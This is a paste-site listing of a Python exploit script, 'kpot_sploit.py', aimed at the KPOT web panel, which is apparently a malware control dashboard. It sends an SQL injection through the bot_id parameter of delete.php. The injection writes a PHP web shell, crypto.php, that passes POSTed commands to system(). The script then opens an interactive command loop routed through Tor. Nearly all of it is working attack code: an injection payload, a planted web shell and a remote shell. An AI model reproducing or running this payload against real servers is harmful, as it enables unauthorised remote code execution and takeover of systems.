· 7 years ago · Dec 09, 2018, 07:46 AM
1import requests
2import argparse
3import base64
4
5# requires pysocket for tor and requests for requests :-p
6
7def get_args():
8 parser = argparse.ArgumentParser(
9 prog="kpot_sploit.py",
10 formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
11 epilog= '''
12 This script will exploit the RCE/SQL vulnerability in KPOT Dashboard.
13 ''')
14 parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/panel/)")
15 # parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
16 parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
17 args = parser.parse_args()
18 return args
19
20def pwn_target(target, proxy):
21 requests.packages.urllib3.disable_warnings()
22 proxies = {'http': proxy, 'https': proxy}
23 print('[*] Probing...')
24 get_params = {
25 'bot_id':"666'; ATTACH DATABASE 'crypto.php' AS dba; CREATE TABLE IF NOT EXISTS dba.mytable(text TEXT NOT NULL); INSERT INTO dba.mytable VALUES('<?php echo system($_POST[\"cmd\"]); ?>'); --",
26 'file':'123'
27 }
28 try:
29 r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
30 print("[*] Your IP: {}".format(r.text))
31 headers = {
32 "User-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
33 }
34 r = requests.get(target + '/delete.php', params=get_params, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
35 print('[+] If it worked, you will get a funky shell...')
36 while(1):
37 try:
38 cmd = input("$ ")
39 r = requests.post(target + '/crypto.php', data={'cmd':cmd}, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
40 print(r.text[300:])
41 except KeyboardInterrupt:
42 print("[+] Bye! Don't forget to clean up.")
43 exit(0)
44 except:
45 print("[-] ERROR: Something went wrong.")
46 print(r.text)
47 raise
48
49def main():
50 print ()
51 print ('KPOT RCE by prsecurity.')
52 args = get_args()
53 pwn_target(args.target.strip(), args.proxy.strip())
54
55
56if __name__ == '__main__':
57 main()